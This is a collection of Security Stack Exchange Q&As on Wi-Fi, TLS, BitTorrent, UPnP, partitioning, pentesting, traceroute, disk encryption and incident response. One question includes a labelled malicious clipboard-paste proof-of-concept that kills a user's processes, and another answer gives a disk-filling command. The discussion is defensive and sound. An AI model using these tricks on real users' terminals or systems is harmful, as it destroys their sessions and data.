why are they illegal in some places? | The risk here is in believing that a "hidden SSID" changes anything to the security. A non-hidden SSID means that the router will shout at regular intervals "hello everybody, I am Joe the Router, you may talk to me !". A hidden SSID means that the client machine (not the attacker's machine) will shout at regular intervals "Hey, Joe, where are you ? Please respond !". Either way, assuming that the SSID (here, "Joe") is not known to any attacker would be overly naive. A point that could be made is that when the SSID is hidden, then an attacker may assume that the SSID is valuable in some way; so, when your PC connects, your PC shows that it knows the valuable SSID, and thus is also a valuable target in some sense. Not that it would change much things in practice: attackers will attack everything in range anyway, as a matter of principle. | {
"source": [
"https://security.stackexchange.com/questions/38365",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16726/"
]
} |
38,460 | Is it possible to protect my site from HTTrack Website Copier or any similar program? Without setting a max number of HTTP request from users. | No, there's no way to do it. Without setting connection parameter limits, there's even no way to make it relatively difficult. If a legitimate user can access your website, they can copy its contents, and if they can do it normally with a browser, then they can script it. You might setup User-Agent restrictions, cookie validation, maximum connections, and many other techniques, but none will stop somebody determined to copy your website. | {
"source": [
"https://security.stackexchange.com/questions/38460",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26356/"
]
} |
38,589 | I have noticed that, a HTTPS connection can be set up with the server configured to use a certificate, and when additional security is required, the server can ask the client to provide a client certificate, validate it and set up connection. It seems that, if we ask all clients to provide their certificates, which contains public keys and corresponding signatures, the secure connection should also able to be established. The server just validates the signatures, then encrypts the data being send using client's public key. If knowledge of the identity of clients is more important than that of the server, the server certificate is of no use here. So is it supported in HTTPS protocol, that the server provides no certificates but ask for client certificates, and then establish HTTPS connection? | HTTPS is HTTP-within-SSL. SSL is a tunnel protocol: it works over an existing bidirectional stream for data, and provides a bidirectional stream for data. The two parties involved in SSL are the client and the server , which are two roles within the SSL protocol; it is not required that these roles map to the notions of "client" and "server" of the underlying transport protocol. For instance, a setup can be imagined, in which the client system (C) initiates a TCP connection to the server (S), and then the server initiates a SSL handshake, acting as the SSL client (i.e. sending the ClientHello message, instead of waiting for an incoming ClientHello ). This reverses the roles of both machines, and also the security guarantees: the machine S will have a good idea of the identity of the connected client C, but the client C will not be sure of what server S it is talking to (an attacker could have intercepted and redirected the communication). Depending on the context, this may or may not be appropriate. However, this departs from HTTPS , in which the TCP client is also the SSL client, and that client expects the server to show a certificate, which the client will validate against its known, trusted CA, and which contains the expected server name (as extracted from the URL, see section 3.1 ). Correspondingly, existing clients (Web browser) do not support reversal of SSL roles. If your situation calls for using browsers, then you must, of course, use only the functionality available in browsers. SSL does support a few certificate-less cipher suites. The "DH_anon" cipher suites are deemed weak, because they imply no authentication at all (thus, Man-in-the-Middle attacks are possible). The PSK cipher suites imply mutual authentication of both client and server with regards to a shared secret. When the shared secret is of low entropy (say, it is a password ), SRP cipher suites are better. There again, these cipher suites are not (yet) available in mainstream browsers (although some people are working on it ). They require a shared secret (key or password), a condition which may or may not be easy to achieve in your specific context. If knowledge of the server identity is unimportant, then you can give the server a self-signed certificate, along with instructions for clients on how to make their browser accept the server certificate without cringing too loudly (see this question as a starting point). This will map to "normal SSL", which has two benefits: Existing browsers support that. When the server presents a certificate, however bogus, it is then allowed to ask, in return, for a client certificate, yielding the kind of authentication that you are looking for. And Web browsers do support client certificates for SSL. Note that the self-signed certificate contains the server public key. Though this public key won't be validated, it will still be used to power the key exchange, so you must use an appropriate key type and length (say, RSA 2048). Alternatively, use one of the "DHE" cipher suites, in which case the server public key is used only for signatures, not to actually protect the data, so ( in your specific case ), its size and secrecy becomes unimportant. | {
"source": [
"https://security.stackexchange.com/questions/38589",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11305/"
]
} |
38,629 | Let's assume that a legitimate torrent file has been safely and successfully downloaded over HTTPS and perhaps even OpenPGP verification was used to verify the integrity of the torrent file. How good are torrent clients against attackers who want to add malicious content to the download? Does torrent clients only catch disruption due to network failure or any kind of of attack? Does torrent clients only use SHA1 or a stronger hash algorithm, were fewer people argue whether its still secure or not, such as SHA256? (I am NOT asking about any privacy/piracy/legal aspects here.) | BitTorrent uses a method called Chunking, in which files are divided into 64 KB – 2 MB pieces. Each piece is hashed and the hashes (along with the piece size) are stored in the torrent's metadata (the small .torrent file, or the metadata you receive via DHT ). That, along with the info_hash , makes BitTorrent quite resistant to intentional tampering (poisoning). SHA-1 is used in the info_hash and to verify the chunks. The University of Southern California has made study on the subject: We discover that BitTorrent is most resistant to content poisoning. ... Because the index file is distributed outside of the P2P file-sharing
system, each chunk can be verified with a reliable hash contained in
the metadata. This verification provides BitTorrent protocol with high
resistance to content poisoning. | {
"source": [
"https://security.stackexchange.com/questions/38629",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25557/"
]
} |
38,631 | I found port forwarding entries in home router that I haven't manually configured. Is that because of UPnP? Are applications simply able to tell the router to forward ports on their own? Are there any security implications with enabling UPnP? | Many modern home routers usually come with a feature called Universal Plug and Play (UPnP) to allow NAT traversal using the IGD Protocol . What that means is that an application can ask the router "Hey, could you please let external computers speak to me on port xxxx", then the router creates a port map for the requested port. UPnP has a variety of security problems, the main of which is that it doesn't have any built-in authentication. One example is PoC by Petko D. Petkov where he demonstrated how Flash can be used to send UPnP commands to a local router when visiting a malicious page. UPnP also makes it much easier for malware on your computer to open ports and listen for commands from a C&C Sever . Despite not being around for a long time, UPnP has a long list of security issues mainly due to poor implementation. Researchers at Rapid7 have shown that nearly 81-million IP addresses have responded to their UPnP requests (mind you, those requests are coming from external networks), and many of these devices had vulnerabilities that can lead to complete takeover. So my advice is this : If you want port-forwarding, you probably want it for a reason for a specific program, so disable UPnP and map the ports yourself. It's not something you'll be doing everyday. | {
"source": [
"https://security.stackexchange.com/questions/38631",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28073/"
]
} |
38,691 | Is there a security reason to disallow a user to change their password as frequently as they want? I have found this security policy in a site and I am not sure why it is enforcing it. One reason I can imagine is that the change password functionality is a 'costly procedure', and changing it multiple times in a row can provoke a DoS on the site or produce too much traffic in the mail server that sends an email each time a password is changed. Any other reason? Note: I have found a similar question here: Is there any conceivable reason to prevent a password change in an authentication system? | The real reason why such policies are in place is because they are in place by default . That's how things go in Active Directory: Passwords expire after 42 days. When changing his password, the (non-admin) user cannot reuse one of his 24 previous passwords. User cannot change his password twice within the same 24-hour frame. So you will encounter such things a lot, mostly because it would require efforts and understanding to set them otherwise. Most people go through their life in a state of blissful ignorance and laziness, and sysadmins are no exception. When a rationale for the third property (24 hours between password changes) is needed, the oft-cited reason is what @bobince says: to prevent a snarky user from cycling through 23 dummy passwords to get back at his initial password, because that would contradict the first rule (no password reuse). Of course, such rules won't prevent users from using "sequence passwords": Password37, Password38, Password39... which somehow defeats the purpose of forcing password expiry (purpose which is already of very dubious value). And preventing the user from changing his password as often as he wants also means that the user cannot change his password as often as he needs : if the user notices a shoulder surfer who just stole his password, a security aware user would like to quickly change his own password, which would be, in that case, a very good idea. The rule against password change may prevent that. | {
"source": [
"https://security.stackexchange.com/questions/38691",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22291/"
]
} |
38,793 | I recently acquired a netbook to play with, and I want to install Kali Linux so I can start learning about network security and exploit development. I want to use this to learn as much about security as I can. What is the best way to partition a linux box so that it is most resistent to a security risk? Is a single partition containing all of the folders in linux really that bad? Extra points if you can go into details about the threats possible. I want to learn as much as possible. | Please keep in mind the Holy Trinity of Information Security: C(onfidentiality), I(ntegrity), and A(vailability). So when we talk about configuration hardening you need to consider the technology you're working with, the information being protected, how the information is used within the organization, and the threats. Based on those answers, and possibly others, you can begin to determine which of the tenants are most important and what to focus on. At the filesystem level you're typically most interested in Integrity and Availability. The Confidentiality of the information should probably be handled at a different layer, but how you lay our your filesystems and how you use them should make sure that the information is both trustworthy and is always available when it's needed. One thing to keep in mind when laying out your partitions are failure modes. Typically that question is of the form: "What happens when partition x fills up?" What happens if your partition storing the OS is full? Strange things sometimes happen when / fills up. Sometimes the system hangs. Sometimes no new login sessions can occur. Sometimes the system refuses to boot. Of all the failure modes this one is the hardest to strictly characterize as its symptoms are the most likely to change based on OS, kernel version, configuration, etc. Some filesystems, particularly the ext line, reserve a certain amount of space when the filesystem is created. This reseved space can only be used by the root user and is intended to allow the systems administrator to still operate and clean out space. What happens if your partition storing logs is full? You lose auditing/reporting data and is sometimes used by attackers to hide their activity. In some cases your system will not authenticate new users if it can't record their login event. What happens on an RPM based system when /var is full? The package manager will not install or update packages and, depending on your configuration, may fail silently. Filling up a partition is easy, especially when a user is capable of writing to it. For fun, run this command and see how quickly you can make a pretty big file: cat /dev/zero > zerofile . It goes beyond filling up partitions as well, when you place locations on different mount points you can also customize their mount options. What happens when /dev/ is not mounted with noexec ? Since /dev is typically assumed to be maintained by the OS and only contain devices it was frequently (and sometimes still is) used to hide malicious programs. Leaving off noexec allows you do launch binaries stored there. For all these reasons, and more, many hardening guides will discuss partitioning as one of the first steps to be performed. In fact, if you are building a new server how to partition the disk is very nearly exactly the first thing you have to decide on, and often the most difficult to later change. There exists a group called the Center for Internet Security that produces gobs of easy to read configuration guides. You can likely find a guide for your specific Operating System and see any specifics they may say. If we look at RedHat Enterprise Linux 6, the recommended partitioning scheme is this: # Mount point Mount options
/tmp nodev,nosuid,noexec
/var
/var/tmp bind (/tmp)
/var/log
/var/log/audit
/home nodev
/dev/shm nodev,nosuid,noexec The principle behind all of these changes are to prevent them from impacting each other and/or to limit what can be done on a specific partition. Take the options for /tmp for example. What that says is that no device nodes can be created there, no programs can be executed from there, and the set-uid bit can't be set on anything. By its very nature, /tmp is almost always world writable and is often a special type of filesystem that only exists in memory. This means that an attacker could use it as an easy staging point to drop and execute malicious code, then crashing (or simply rebooting) the system will wipe clean all the evidence. Since the functionality of /tmp doesn't require any of that functionality, we can easily disable the features and prevent that situation. The log storage places, /var/log and /var/log/audit are carved off to help buffer them from resource exhaustion. Additionally, auditd can perform some special things (typically in higher security environments) when its log storage begins to fill up. By placing it on its partition this resource detection performs better. To be more verbose, and quote mount(8) , this is exactly what the above used options are: noexec Do not allow direct execution of any binaries on the mounted file system. (Until recently it was possible to run binaries anyway using a command like /lib/ld*.so
/mnt/binary. This trick fails since Linux 2.4.25 / 2.6.0.) nodev Do not interpret character or block special devices on the file system. nosuid Do not allow set-user-identifier or set-group-identifier bits to take effect. (This seems safe, but is in fact rather unsafe if you have suidperl(1) installed.) From a security perspective these are very good options to know since they'll allow you to put protections on the filesystem itself. In a highly secure environment you may even add the noexec option to /home . It'll make it harder for your standard user to write shell scripts for processing data, say analyzing log files, but it will also prevent them from executing a binary that will elevate privileges. Also, keep in mind that the root user's default home directory is /root . This means it will be in the / filesystem, not in /home . Exactly how much you give to each partition can vary greatly depending on the systems workload. A typical server that I've managed will rarely require person interaction and as such the /home partition doesn't need to be very big at all. The same applies to /var since it tends to store rather ephemeral data that gets created and deleted frequently. However, a web server typically uses /var/www as its playground, meaning that either that needs to be on a separate partition as well or /var/ needs to be made big. In the past I have recommended the following as baselines. # Mount Point Min Size (MB) Max Size (MB)
/ 4000 8000
/home 1000 4000
/tmp 1000 2000
/var 2000 4000
swap 1000 2000
/var/log/audit 250 These need to be reviewed and adjusted according to the system's purpose, and how your environment operates. I would also recommend using LVM and against allocating the entire disk. This will allow you to easily grow, or add, partitions if such things are required. | {
"source": [
"https://security.stackexchange.com/questions/38793",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6372/"
]
} |
39,080 | I recently installed Kubuntu and I noticed the option for having an encrypted LVM. The behavior suggests it's full disk encryption since I need to put in a password before I can boot. This article and others I have read suggest it's full disk encryption. Is this actually full disk encryption? If so what type of encryption does it use? or is it just a password I have to put in before it hits grub or lilo but the disk itself is unencrypted. The only reason I don't believe this is full disk encryption is because the only full disk encryption software I've used before was truecrypt which took hours to encrypt a hard drive and when I did something crazy like AES>Serpent>Blowfish the machine would be noticeably slower. Kubuntu's encryption didn't take 4 hours to setup and the machine doesn't seem slower at all. | LVM operates below the filesystem, so whatever it does, it does so at the disk level. So yes, indeed, when LVM implements encryption this is "full-disk encryption" (or, more accurately, "full-partition encryption"). Applying encryption is fast when it is done upon creation : since the initial contents of the partition are ignored, they are not encrypted; only new data will be encrypted as it is written. However, when applying encryption on an existing volume (as is typical of TrueCrypt ) requires reading, encrypting and writing back all used data sectors; this includes sectors which were previously in use, even if they are not in use right now, because they may contain excerpts of some files which were later on copied around. So that kind of after-the-fact application of encryption requires reading and rewriting the whole volume. A mechanical harddisk will run at about 100 MB/s, so a 1 TB volume will need 6 hours (3 for reading, 3 for writing). The encryption itself needs not be slow, at least if it has been properly implemented. A basic PC will be able to encrypt data at more than 100 MB/s, with AES, using a single core (my underpowered laptop achieves 120 MB/s); with recent x86 cores offering the AES-NI instructions , 1 GB/s is reachable. Thus, the CPU can keep pace with the disk, and, most of the time, the user will not notice any slowdown. Of course, if you do "something crazy" like cascading algorithms, well, you've done something crazy and you will have to pay for it. Cascading three algorithms means having to compute all three whenever you read or write data. AES is fast; Serpent not so (about twice slower). In any case, cascading encryption algorithms is not a very rational idea . By default, "encrypted LVM volume" in Linux will rely on dm-crypt , which is configurable (several algorithms are supported) but does not indulge into voodooistic cascades, and that's a blessing. (This does show one of the little paradoxes of security: if it is too transparent and efficient, then people get nervous. For the same reason, medicine pills must taste foul.) | {
"source": [
"https://security.stackexchange.com/questions/39080",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27595/"
]
} |
39,101 | Today I experienced a situation where a person responsible for the security of a company required a pentesting company to withdraw a clause in the contract that says that: "during the pentest there exist the possibility to delete or modify sensitive data in the production environment unintentionally due to the execution of some tools, exploits, techniques, etc." The client says that he is not going to accept that clause and that he believes that no company would accept that clause. He thinks that during a pentest information could be accessed but never deleted or modified. We know that the execution of some tools like web crawlers or spiders can delete data if the web application is very badly programmed, so the possibility always exists if those types of tools are going to be used. I know that these are the conditions of the client, and should be accepted, but: Can a skilled and professional pentester always assure that no data will be deleted or modified in production during a pentest? Can a pentest really be done if the pentest team has the limitation that data cannot be created nor modified? Should the pentesting company always include the disclaimer clause just in case? | There's no way that a pentester can 100% assure that data will not be modified or deleted, in the same way as they can't assure that system availability won't be affected (I've knocked systems over with a port scan or a single ' character). as you say a web crawler can delete data from a system if it's been set-up badly. I'd say that what should be said is something like "every care will be taken to ensure that the testing does not negatively affect the systems under review and no deliberate attempts will be made to modify or delete production data or to negatively affect the availability of in-scope systems. However with all security testing there is a risk that systems will be affected and the customer should ensure that backups of all data and systems are in place prior to the commencement of the review" | {
"source": [
"https://security.stackexchange.com/questions/39101",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22291/"
]
} |
39,118 | Clipboard abuse from websites Many websites use JavaScript or CSS to stealthily insert or replace text in the user's clipboard whenever they copy information from the page. As far as I know this is mostly used for advertising purposes, but PoC for exploits have been demonstrated. However I discovered that one does not even need JS or CSS to craft an exploit that has malicious effects when pasted in a terminal. Pasting hidden backspace characters can change the whole meaning of a shell command. Pasting in a term-based editor isn't safe either. Pasting Esc then :! can cause a running Vim instance to execute a shell command. Pasting ^X^C will quit Emacs and/or even cat . Pasting ^Z will stop mostly any term-based editor and return to the shell. What makes it worse is that many trusted websites do not sanitise these non-printable characters. Twitter filters out Esc but not backspace. Pastebin.com doesn't appear to filter out anything. Neither does Stack Exchange , hence the following exploit ( WARNING: malicious code, DO NOT copy and paste into a Unix terminal!! ) that could very well be crafted into something worse and more likely to be pasted by a victim: echo '.!: keS i3l ldKo -1+9 +2-1' > /tmp/lol
echo ':!. keS i3l ldKo -2+9 +7-1' >> /tmp/lol
echo '.:! keS i3l ldKo -3+9 +4-1' >> /tmp/lol
sleep 1
md5sum /tmp/lol Edit : Raw backspaces are now filtered by Stack Exchange, so this PoC requires &# escapes. /Edit Here is how Chrome renders it: Firefox isn't fooled as easily, but still remains oblivious to the JS or CSS approach: And when pasted into a terminal, it just kills all the user’s processes. What to do? What this basically tells me is that I should never, ever, copy anything from a web page and paste it into a terminal application . Well, great. My work environment is basically 1 web browser and 40 terminal windows/tabs. I copy and paste code snippets all the time. Now, is there anyone who can protect me from my own bad habits (which, honestly, I don’t think are that bad)? Browser vendors? Terminal vendors? Clipboard system vendors? A third-party application maybe? | You might have guessed this, but never use the terminals pasting functionality to paste things into vim/emacs . It's like sending a batch of commands to the editor, that can do anything. For these reasons, editors have their own copy-pasting functionality, which cannot be injected. For instance, in vim, you should use the + register to exchange data with the system clipboard ( "+p for pasting). Regarding the shell or other terminal applications: It has been established , that you must not paste unsafe data into your terminal. There is a safe-paste plugin for zsh, which prevents code from actually running when pasted, but someone has already exploited it anyways . Also, a similiar question (about accidental pasting) has been asked on apple.se. Most of the solutions might also work for you. Update: In vim, if set mouse=a is used, pasting with the middle mouse button is safe. You can still paste with shift-Insert though. | {
"source": [
"https://security.stackexchange.com/questions/39118",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6480/"
]
} |
39,178 | There is a utility called tcptraceroute , and this enhancement called intrace that is used just like a standard traceroute, but it works over TCP. How is the syn flag in TCP used to achieve traceroute like functionality (when ICMP is off) What information can be disclosed (or other risks)? How can this be mitigated? (routers, hosts, ...both?) This has been described as similar to the nmap command when passed the -sS flag. If this is accurate, what does it actually mean? | All the tracerouting tools rely on the following principle: they send packets with a short life, and wait for ICMP packets reporting the death of these packets. An IP packet has a field called "TTL" (as "Time To Live") which is decremented at each hop; when it reaches 0, the packet dies, and the router on which this happens is supposed to send back a "Time Exceeded" ICMP message . That ICMP message contains the IP address of the said router, thus revealing it. None of the tools you link to can do anything if some firewall blocks the "Time Exceeded" ICMP packets. However, blocking such packets tend to break the Internet (because hosts adaptively change the TTL in the packets they send in order to cope with long network paths, and they need these ICMP for this process), so, on a general basis, the "Time Exceeded" ICMP packets are not blocked. What is often blocked , however, is the kind of short-lived packets that traceroute sends. These are the packets with the artificially low TTL. If they are blocked by a firewall, they never get to die "of old age", and thus no Time Exceeded ICMP. For TTL-processing and the "Time Exceeded" ICMP, the type of packet does not matter; this occurs at the IP level. But firewalls also look at packet contents. The goal is to fool firewalls so that they allow the short-lived packet to flow (and then die). Plain traceroute uses either UDP packets, or ICMP "Echo" packets, both kinds being routinely blocked by (over)zealous sysadmins. tcptraceroute instead uses a TCP "SYN" packet, i.e. the kind of packet that would occur as first step in the TCP "three-way handshake". That kind of packet is not usually blocked by firewall, at least as long as the destination port is "allowed". tcptraceroute will not complete any TCP handshake; it just relies on the ideas that SYN packets are not shot on sight by firewalls. intrace goes one step further in that it waits for an existing TCP connection (it does so by inspecting all packets, à la tcpdump ). When it sees a connection, and the user presses ENTER, intrace will send short-live packets which appear as being part of the observed connection. intrace can do that because it has seen the packets, and so knows the IP addresses, ports and sequence numbers. All relevant firewalls will let these packets pass, since they (obviously) allow the observed TCP connection to proceed. The short-lived packets are adjusted so that they will not disrupt the TCP connection (i.e. they are simple "ACK" packets with no data by themselves, so the destination OS will simply ignore them). Edit: I notice that I did not answer part of the question. Here it goes: there is no risk. There is nothing to mitigate. traceroute reveals IP addresses of routers involved in routing packets. IP addresses are not meant to be secret and are rather easy to obtain for attackers through various means (mass scanning comes to mind, but also searching garbage bags for printouts of network maps -- the modern fashion of recycling makes dumpster diving a much easier and cleaner activity than what it used to be). However, a relatively widespread myth is that keeping your addresses secret somehow ensures security. Correspondingly, many sysadmins consider traceroute as a serious breach, to be fixed and blocked as soon as possible. In practice, though, this is all baloney. If revealing a few internal IP addresses is a major issue, then this means that your network is doomed. Worrying about secrecy of IP addresses is like triggering a major incident response plan because an outsider learned the menu at the company's cafeteria. It is disproportionate. Granted, having precise and extensive knowledge of the network infrastructure can only help attackers; but not in really significant amounts. Keeping IP addresses secret is not worth breaking connectivity through excessive filtering (for instance, blocking the "fragmentation required" ICMP is deadly for any client behind an ADSL+PPPoE link). | {
"source": [
"https://security.stackexchange.com/questions/39178",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
39,231 | I suspect that one or more of my servers is compromised by a hacker, virus, or other mechanism: What are my first steps? When I arrive on site should I disconnect the server, preserve "evidence", are there other initial considerations? How do I go about getting services back online? How do I prevent the same thing from happening immediately again? Are there best practices or methodologies for learning from this incident? If I wanted to put a Incident Response Plan together, where would I start? Should this be part of my Disaster Recovery or Business Continuity Planning? This is meant to be a canonical post for this topic. Originally from serverfault . | Originally from serverfault. Thanks to Robert Moir (RobM) It's hard to give specific advice from what you've posted here but I do have some generic advice based on a post I wrote ages ago back when I could still be bothered to blog. Don't Panic First things first, there are no "quick fixes" other than restoring your system from a backup taken prior to the intrusion, and this has at least two problems. It's difficult to pinpoint when the intrusion happened. It doesn't help you close the "hole" that allowed them to break in last time, nor deal with the consequences of any "data theft" that may also have taken place. This question keeps being asked repeatedly by the victims of hackers breaking into their web server. The answers very rarely change, but people keep asking the question. I'm not sure why. Perhaps people just don't like the answers they've seen when searching for help, or they can't find someone they trust to give them advice. Or perhaps people read an answer to this question and focus too much on the 5% of why their case is special and different from the answers they can find online and miss the 95% of the question and answer where their case is near enough the same as the one they read online. That brings me to the first important nugget of information. I really do appreciate that you are a special unique snowflake. I appreciate that your website is too, as it's a reflection of you and your business or at the very least, your hard work on behalf of an employer. But to someone on the outside looking in, whether a computer security person looking at the problem to try and help you or even the attacker himself, it is very likely that your problem will be at least 95% identical to every other case they've ever looked at. Don't take the attack personally, and don't take personally the recommendations that follow here or that you get from other people. If you are reading this after just becoming the victim of a website hack then I really am sorry, and I really hope you can find something helpful here, but this is not the time to let your ego get in the way of what you need to do. You have just found out that your server(s) got hacked. Now what? Do not panic. Absolutely do not act in haste, and absolutely do not try and pretend things never happened and not act at all. First: understand that the disaster has already happened. This is not the time for denial; it is the time to accept what has happened, to be realistic about it, and to take steps to manage the consequences of the impact. Some of these steps are going to hurt, and (unless your website holds a copy of my details) I really don't care if you ignore all or some of these steps, but doing so will make things better in the end. The medicine might taste awful but sometimes you have to overlook that if you really want the cure to work. Stop the problem from becoming worse than it already is: The first thing you should do is disconnect the affected systems from the Internet. Whatever other problems you have, leaving the system connected to the web will only allow the attack to continue. I mean this quite literally; get someone to physically visit the server and unplug network cables if that is what it takes, but disconnect the victim from its muggers before you try to do anything else. Change all your passwords for all accounts on all computers that are on the same network as the compromised systems. No really. All accounts. All computers. Yes, you're right, this might be overkill; on the other hand, it might not. You don't know either way, do you? Check your other systems. Pay special attention to other Internet facing services, and to those that hold financial or other commercially sensitive data. If the system holds anyone's personal data, immediately inform the person responsible for data protection (if that's not you) and URGE a full disclosure. I know this one is tough. I know this one is going to hurt. I know that many businesses want to sweep this kind of problem under the carpet but the business is going to have to deal with it - and needs to do so with an eye on any and all relevant privacy laws. However annoyed your customers might be to have you tell them about a problem, they'll be far more annoyed if you don't tell them, and they only find out for themselves after someone charges $8,000 worth of goods using the credit card details they stole from your site. Remember what I said previously? The bad thing has already happened. The only question now is how well you deal with it. Understand the problem fully: Do NOT put the affected systems back online until this stage is fully complete, unless you want to be the person whose post was the tipping point for me actually deciding to write this article. I'm not going to link to that post so that people can get a cheap laugh, but the real tragedy is when people fail to learn from their mistakes. Examine the 'attacked' systems to understand how the attacks succeeded in compromising your security. Make every effort to find out where the attacks "came from", so that you understand what problems you have and need to address to make your system safe in the future. Examine the 'attacked' systems again, this time to understand where the attacks went, so that you understand what systems were compromised in the attack. Ensure you follow up any pointers that suggest compromised systems could become a springboard to attack your systems further. Ensure the "gateways" used in any and all attacks are fully understood, so that you may begin to close them properly. (e.g. if your systems were compromised by a SQL injection attack, then not only do you need to close the particular flawed line of code that they broke in by, you would want to audit all of your code to see if the same type of mistake was made elsewhere). Understand that attacks might succeed because of more than one flaw. Often, attacks succeed not through finding one major bug in a system but by stringing together several issues (sometimes minor and trivial by themselves) to compromise a system. For example, using SQL injection attacks to send commands to a database server, discovering the website/application you're attacking is running in the context of an administrative user and using the rights of that account as a stepping-stone to compromise other parts of a system. Or as hackers like to call it: "another day in the office taking advantage of common mistakes people make". Why not just "repair" the exploit or rootkit you've detected and put the system back online? In situations like this the problem is that you don't have control of that system any more. It's not your computer any more. The only way to be certain that you've got control of the system is to rebuild the system. While there's a lot of value in finding and fixing the exploit used to break into the system, you can't be sure about what else has been done to the system once the intruders gained control (indeed, it's not unheard of for hackers that recruit systems into a botnet to patch the exploits they used themselves, to safeguard "their" new computer from other hackers, as well as installing their rootkit). Make a plan for recovery and to bring your website back online and stick to it: Nobody wants to be offline for longer than they have to be. That's a given. If this website is a revenue generating mechanism then the pressure to bring it back online quickly will be intense. Even if the only thing at stake is your / your company's reputation, this is still going generate a lot of pressure to put things back up quickly. However, don't give in to the temptation to go back online too quickly. Instead move as fast as possible to understand what caused the problem and to solve it before you go back online or else you will almost certainly fall victim to an intrusion once again, and remember, "to get hacked once can be classed as misfortune; to get hacked again straight afterward looks like carelessness" (with apologies to Oscar Wilde). I'm assuming you've understood all the issues that led to the successful intrusion in the first place before you even start this section. I don't want to overstate the case but if you haven't done that first then you really do need to. Sorry. Never pay blackmail / protection money. This is the sign of an easy mark and you don't want that phrase ever used to describe you. Don't be tempted to put the same server(s) back online without a full rebuild. It should be far quicker to build a new box or "nuke the server from orbit and do a clean install" on the old hardware than it would be to audit every single corner of the old system to make sure it is clean before putting it back online again. If you disagree with that then you probably don't know what it really means to ensure a system is fully cleaned, or your website deployment procedures are an unholy mess. You presumably have backups and test deployments of your site that you can just use to build the live site, and if you don't then being hacked is not your biggest problem. Be very careful about re-using data that was "live" on the system at the time of the hack. I won't say "never ever do it" because you'll just ignore me, but frankly I think you do need to consider the consequences of keeping data around when you know you cannot guarantee its integrity. Ideally, you should restore this from a backup made prior to the intrusion. If you cannot or will not do that, you should be very careful with that data because it's tainted. You should especially be aware of the consequences to others if this data belongs to customers or site visitors rather than directly to you. Monitor the system(s) carefully. You should resolve to do this as an ongoing process in the future (more below) but you take extra pains to be vigilant during the period immediately following your site coming back online. The intruders will almost certainly be back, and if you can spot them trying to break in again you will certainly be able to see quickly if you really have closed all the holes they used before plus any they made for themselves, and you might gather useful information you can pass on to your local law enforcement. Reducing the risk in the future. The first thing you need to understand is that security is a process that you have to apply throughout the entire life-cycle of designing, deploying and maintaining an Internet-facing system, not something you can slap a few layers over your code afterwards like cheap paint. To be properly secure, a service and an application need to be designed from the start with this in mind as one of the major goals of the project. I realise that's boring and you've heard it all before and that I "just don't realise the pressure man" of getting your beta web2.0 (beta) service into beta status on the web, but the fact is that this keeps getting repeated because it was true the first time it was said and it hasn't yet become a lie. You can't eliminate risk. You shouldn't even try to do that. What you should do however is to understand which security risks are important to you, and understand how to manage and reduce both the impact of the risk and the probability that the risk will occur. What steps can you take to reduce the probability of an attack being successful? For example: Was the flaw that allowed people to break into your site a known bug in vendor code, for which a patch was available? If so, do you need to re-think your approach to how you patch applications on your Internet-facing servers? Was the flaw that allowed people to break into your site an unknown bug in vendor code, for which a patch was not available? I most certainly do not advocate changing suppliers whenever something like this bites you because they all have their problems and you'll run out of platforms in a year at the most if you take this approach. However, if a system constantly lets you down then you should either migrate to something more robust or at the very least, re-architect your system so that vulnerable components stay wrapped up in cotton wool and as far away as possible from hostile eyes. Was the flaw a bug in code developed by you (or someone working for you)? If so, do you need to re-think your approach to how you approve code for deployment to your live site? Could the bug have been caught with an improved test system, or with changes to your coding "standard" (for example, while technology is not a panacea, you can reduce the probability of a successful SQL injection attack by using well-documented coding techniques). Was the flaw due to a problem with how the server or application software was deployed? If so, are you using automated procedures to build and deploy servers where possible? These are a great help in maintaining a consistent "baseline" state on all your servers, minimising the amount of custom work that has to be done on each one and hence hopefully minimising the opportunity for a mistake to be made. Same goes with code deployment - if you require something "special" to be done to deploy the latest version of your web app then try hard to automate it and ensure it always is done in a consistent manner. Could the intrusion have been caught earlier with better monitoring of your systems? Of course, 24-hour monitoring or an "on call" system for your staff might not be cost effective, but there are companies out there who can monitor your web facing services for you and alert you in the event of a problem. You might decide you can't afford this or don't need it and that's just fine... just take it into consideration. Use tools such as tripwire and nessus where appropriate - but don't just use them blindly because I said so. Take the time to learn how to use a few good security tools that are appropriate to your environment, keep these tools updated and use them on a regular basis. Consider hiring security experts to 'audit' your website security on a regular basis. Again, you might decide you can't afford this or don't need it and that's just fine... just take it into consideration. What steps can you take to reduce the consequences of a successful attack? If you decide that the "risk" of the lower floor of your home flooding is high, but not high enough to warrant moving, you should at least move the irreplaceable family heirlooms upstairs. Right? Can you reduce the amount of services directly exposed to the Internet? Can you maintain some kind of gap between your internal services and your Internet-facing services? This ensures that even if your external systems are compromised the chances of using this as a springboard to attack your internal systems are limited. Are you storing information you don't need to store? Are you storing such information "online" when it could be archived somewhere else. There are two points to this part; the obvious one is that people cannot steal information from you that you don't have, and the second point is that the less you store, the less you need to maintain and code for, and so there are fewer chances for bugs to slip into your code or systems design. Are you using "least access" principles for your web app? If users only need to read from a database, then make sure the account the web app uses to service this only has read access, don't allow it write access and certainly not system-level access. If you're not very experienced at something and it is not central to your business, consider outsourcing it. In other words, if you run a small website talking about writing desktop application code and decide to start selling small desktop applications from the site then consider "outsourcing" your credit card order system to someone like Paypal. If at all possible, make practicing recovery from compromised systems part of your Disaster Recovery plan. This is arguably just another "disaster scenario" that you could encounter, simply one with its own set of problems and issues that are distinct from the usual 'server room caught fire'/'was invaded by giant server eating furbies' kind of thing. ... And finally I've probably left out no end of stuff that others consider important, but the steps above should at least help you start sorting things out if you are unlucky enough to fall victim to hackers. Above all: Don't panic. Think before you act. Act firmly once you've made a decision, and leave a comment below if you have something to add to my list of steps. | {
"source": [
"https://security.stackexchange.com/questions/39231",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3339/"
]
} |
